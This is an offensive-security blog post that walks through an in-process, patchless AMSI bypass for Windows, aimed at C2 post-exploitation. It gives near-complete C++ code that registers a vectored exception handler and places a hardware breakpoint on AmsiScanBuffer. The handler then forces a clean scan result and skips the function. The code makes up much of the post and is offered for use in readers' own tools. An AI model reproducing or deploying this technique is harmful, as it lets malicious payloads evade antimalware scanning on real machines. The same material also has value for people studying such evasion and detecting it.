Some of you may remember my patchless AMSI bypass article and how it was used inside SharpBlock to bypass AMSI on the child process that SharpBlock spawns. This is all well and good when up against client environments that are not too sensitive to the fork-and-run post-exploitation model of operating. But what about those more difficult environments where in-process execution is a must?

SharpBlock leverages the power of a debugger to be able to set breakpoints at various points of interest so that registers and arguments can be manipulated dynamically at runtime once the breakpoint is hit. Since our uber C2 process will not be running under the direction of a SharpBlock debugger, how can we use the same technique without leveraging a debugger as the parent process?

Well, the answer to this is exceptions. Like a divide by zero exception or an access violation exception, breakpoints are also a form of exception. When a debugger is attached to a process, exceptions are reported to the debugger first so it has the opportunity to deal with the exception and continue execution of the program. Applications can also handle exceptions raised internally, via a system called structured exception handling (SEH). You will most commonly see this in code similar to the following.

try{
    FunctionThatCausesDivideByZero();
}catch(DivideByZeroException e){

}

In this scenario, once the function raises the exception, the stack is unwound and execution continues from the catch block. For our purposes, high-level exception handlers like this are no good, since the call stack is unwound without completing the code that was originally running. Enter vectored exception handling.
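To make the unwinding point concrete, here is a minimal, portable C++ sketch. It is only an illustration: `riskyStep` and `runWithHandler` are hypothetical names, and the divide by zero is simulated with an explicit `throw` because C++ does not turn an integer division fault into a language exception on its own. The trace shows that once the exception is raised, the rest of the faulting function never runs.

```cpp
#include <stdexcept>
#include <string>
#include <vector>

// Hypothetical function that may fault part way through its work.
int riskyStep(int divisor, std::vector<std::string>& trace) {
    trace.push_back("riskyStep: start");
    if (divisor == 0) {
        // Simulated fault: raised explicitly for the purpose of the example.
        throw std::domain_error("divide by zero");
    }
    trace.push_back("riskyStep: finish");
    return 100 / divisor;
}

// Calls riskyStep inside a try/catch and records which steps actually ran.
std::vector<std::string> runWithHandler(int divisor) {
    std::vector<std::string> trace;
    try {
        int value = riskyStep(divisor, trace);
        trace.push_back("caller: got " + std::to_string(value));
    } catch (const std::domain_error&) {
        // By the time we get here the stack has been unwound:
        // riskyStep never reaches its "finish" step.
        trace.push_back("catch: handler ran");
    }
    return trace;
}
```

Calling `runWithHandler(0)` records only the start of `riskyStep` followed by the catch block, which is exactly the behaviour that makes this style of handler unsuitable when the interrupted code needs to carry on.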

Vectored exception handling is an extension to SEH which allows applications to register a chain of exception handlers that are called when an exception occurs within the program. The AddVectoredExceptionHandler Windows API call can be used for this purpose. The good thing about a vectored exception handler is that the thread that raised the exception and its corresponding context can be manipulated at the precise point the exception occurred. Execution can then be instructed to continue where it left off (or not, depending on what updates were applied to the thread context). So what exactly is a thread context? A thread context is a snapshot of all the register values at the time the context was captured. This includes the current instruction pointer for the thread, the value of the stack pointer and the values of the general purpose registers.
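The handler chain and the "edit the context, then resume" idea described above can be modelled without touching any Windows API. The sketch below is a toy interpreter, not real vectored exception handling: `ToyContext`, `Disposition`, `run`, `passAlong` and `skipFault` are all hypothetical names invented for illustration, and the context holds only an instruction index and a single register.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Toy stand-in for a thread context: an instruction pointer and one register.
struct ToyContext {
    std::size_t ip;    // index of the next instruction to execute
    std::int64_t acc;  // a single general purpose register
};

enum class Disposition { ContinueExecution, ContinueSearch };
enum class Op { Add, Fault, Halt };

struct Instr {
    Op op;
    std::int64_t operand;
};

using Handler = Disposition (*)(ToyContext&);

// Handler that declines the fault, so the next handler in the chain is tried.
Disposition passAlong(ToyContext&) { return Disposition::ContinueSearch; }

// Handler that edits the context: sets the register and steps past the fault.
Disposition skipFault(ToyContext& ctx) {
    ctx.acc = 5;
    ctx.ip += 1;
    return Disposition::ContinueExecution;
}

// Runs the program. On a Fault, each handler is offered the context in order.
// Returns true if Halt is reached, false if a fault goes unhandled.
bool run(const std::vector<Instr>& program,
         const std::vector<Handler>& handlers, ToyContext& ctx) {
    while (ctx.ip < program.size()) {
        const Instr& in = program[ctx.ip];
        switch (in.op) {
        case Op::Add:
            ctx.acc += in.operand;
            ++ctx.ip;
            break;
        case Op::Halt:
            return true;
        case Op::Fault: {
            bool handled = false;
            for (Handler h : handlers) {
                if (h(ctx) == Disposition::ContinueExecution) {
                    handled = true;
                    break;
                }
            }
            if (!handled) return false;
            // Resume from whatever ip the handler left in the context.
            break;
        }
        }
    }
    return false;
}
```

With the program `Add 1, Fault, Add 10, Halt` and the chain `passAlong, skipFault`, the first handler declines, the second rewrites the context, and the program runs to completion from the new instruction pointer. A handler that claims the fault without moving `ip` would simply fault again on the same instruction, which mirrors what happens with a real breakpoint that is resumed without any change.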

When dealing with an AMSI bypass, the idea will be to register a vectored exception handler and then set a breakpoint on a function within amsi.dll. When the function within amsi.dll is called, an exception will be raised for our breakpoint and our exception handler function will be called. The handler will then manipulate the thread context in a way that indicates the buffer being scanned is clean, and execution will continue. Since SharpBlock intercepts the target from the very beginning of the process, we were able to target the AmsiInitialize function. A valid AMSI context is created when invoking this function, ready for calling other AMSI related functions at a later time. SharpBlock took care of making sure this function would always fail through thread breakpoints and thread context manipulation. For our in-process bypass we don’t have the luxury of using this function, since there are no guarantees that a valid AMSI context has not already been created before our bypass is applied. Therefore we will target the tried and tested AmsiScanBuffer function.

HANDLE setupAMSIBypass(){

    CONTEXT threadCtx;
    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;

    //Load amsi.dll if it hasn't been loaded already.
    if(g_amsiScanBufferPtr == nullptr){
        HMODULE amsi = GetModuleHandleA("amsi.dll");

        if(amsi == nullptr){
            amsi = LoadLibraryA("amsi.dll");
        }

        if(amsi != nullptr){
            g_amsiScanBufferPtr = (PVOID)GetProcAddress(amsi, "AmsiScanBuffer");
        }else{
            return nullptr;
        }

        if(g_amsiScanBufferPtr == nullptr)
            return nullptr;
    }

    //Add our vectored exception handler
    HANDLE hExHandler = AddVectoredExceptionHandler(1, exceptionHandler);

    //Set a hardware breakpoint on the AmsiScanBuffer function.
    //-2 is simply the pseudo handle for the current thread.
    if(GetThreadContext((HANDLE)-2, &threadCtx)){
        enableBreakpoint(threadCtx, g_amsiScanBufferPtr, 0);
        SetThreadContext((HANDLE)-2, &threadCtx);
    }

    return hExHandler;
}

The code above will load amsi.dll if it has not been loaded by the process already, then add our vectored exception handler, using the exceptionHandler function as the method to call when an exception occurs. The last step is to set a breakpoint on the AmsiScanBuffer function address. As mentioned earlier, we are leveraging hardware breakpoints. Software breakpoints would involve patching in an int 3 instruction (0xCC), which rather negates the whole patchless model we are trying to achieve. The drawback to hardware breakpoints is that they need to be applied to each thread within the process if you want a process-wide bypass. Setting it on a single thread when loading a .NET DLL from memory works just fine though, since the AMSI scan is performed within the same thread that loads the .NET PE.

OK, now that we have our exception handler in place, what does the handler function itself look like?

LONG WINAPI exceptionHandler(PEXCEPTION_POINTERS exceptions){

    if(exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP && exceptions->ExceptionRecord->ExceptionAddress == g_amsiScanBufferPtr){

        //Get the return address by reading the value currently stored at the stack pointer
        ULONG_PTR returnAddress = getReturnAddress(exceptions->ContextRecord);

        //Get the 6th argument (index 5), a pointer to the scan result, and set it to a clean result
        int* scanResult = (int*)getArg(exceptions->ContextRecord, 5);
        *scanResult = AMSI_RESULT_CLEAN;

        //Update the current instruction pointer to the caller of AmsiScanBuffer
        setIP(exceptions->ContextRecord, returnAddress);

        //We need to adjust the stack pointer accordingly too so that we simulate a ret instruction
        adjustStackPointer(exceptions->ContextRecord, sizeof(PVOID));

        //Set the eax/rax register to 0 (S_OK), indicating to the caller that AmsiScanBuffer finished successfully
        setResult(exceptions->ContextRecord, S_OK);

        //Clear the hardware breakpoint, since we are now done with it
        clearHardwareBreakpoint(exceptions->ContextRecord, 0);

        return EXCEPTION_CONTINUE_EXECUTION;

    }else{
        return EXCEPTION_CONTINUE_SEARCH;
    }
}

The exception handler first checks that the exception is EXCEPTION_SINGLE_STEP, which is the exception code raised for a hardware breakpoint, and that it occurred at the AmsiScanBuffer address. If either check fails, we return EXCEPTION_CONTINUE_SEARCH and allow the program to deal with the exception as it usually would. If we are dealing with our AmsiScanBuffer breakpoint, we go on to manipulate the result of AmsiScanBuffer.

HRESULT AmsiScanBuffer(
  [in]           HAMSICONTEXT amsiContext,
  [in]           PVOID        buffer,
  [in]           ULONG        length,
  [in]           LPCWSTR      contentName,
  [in, optional] HAMSISESSION amsiSession,
  [out]          AMSI_RESULT  *result
);

I won’t delve into too much detail on the function, since there are a ton of articles out there already on AmsiScanBuffer for the bypasses that deal with patching it. For our purposes we are interested in two things: the 6th argument, which points to where the scan result is written, and the return value. Leveraging the thread context state captured when the exception occurred, we read the result argument and update the value it points to, set the result register to success, adjust the stack pointer to its position prior to the AmsiScanBuffer call, then finally adjust the instruction pointer to the location execution would have reached after AmsiScanBuffer returned. The exception handler returns EXCEPTION_CONTINUE_EXECUTION to indicate that we have handled the exception. The key thing here is that, under the hood, Windows will take the thread context that we have updated and continue execution based on the updates made, essentially bypassing the AmsiScanBuffer call, but not before we have updated the relevant values to indicate a clean result.

I have uploaded a Gist to GitHub for those interested in utilising something similar in their own projects, but soon the latest BOF.NET will be released that contains the patchless AMSI bypass.
